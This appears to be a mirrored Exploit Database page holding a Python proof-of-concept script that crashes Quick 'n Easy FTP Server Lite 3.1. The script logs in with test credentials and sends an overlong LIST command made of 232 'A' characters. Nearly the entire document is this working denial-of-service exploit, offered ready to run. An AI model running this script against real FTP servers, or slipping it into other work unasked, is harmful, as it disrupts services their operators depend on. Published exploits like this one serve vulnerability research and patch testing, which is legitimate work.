Quick ‘n Easy FTP Server Lite 3.1 – Denial of Service

• Exploit Database
• 107 阅读

• 作者： b0nd
  日期： 2010-06-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12853/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53

  #!/usr/bin/python   print "\n############################################################" print "## Team Hackers Garage ##" print "## Quick 'n Easy FTP Server Lite Version 3.1 ##" print "## Crash PoC ##" print "## Sumit Sharma (aka b0nd) ##" print "## sumit.iips@gmail.com ##" print "## ##" print "## Special Thanks to: Double_Zero ##" print "## (http://www.exploit-db.com/author/DouBle_Zer0)##" print "## & ##" print "## corelanc0d3r (CORELAN TEAM) ##" print "## ##" print "############################################################"   # Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable # Tested on: Windows XP SP2 # ftp> ls AAAA... 232 A's...AAA? # Server Crash! # Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string). # No SEH overwrite # No EIP overwrite     from socket import *   host = "172.12.128.4" # Virtual Windows XP SP2 port = 21 user = "test" # "upload" and "download" access password = "test"     s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) print s.recv(1024)   s.send("user %s\r\n" % (user)) print s.recv(1024)   s.send("pass %s\r\n" % (password)) print s.recv(1024)   buffer = "LIST " buffer += "A" * 232 buffer += "?" buffer += "\r\n"   s.send(buffer) print s.recv(1024) s.close() print "---->>> Server Crash!!!"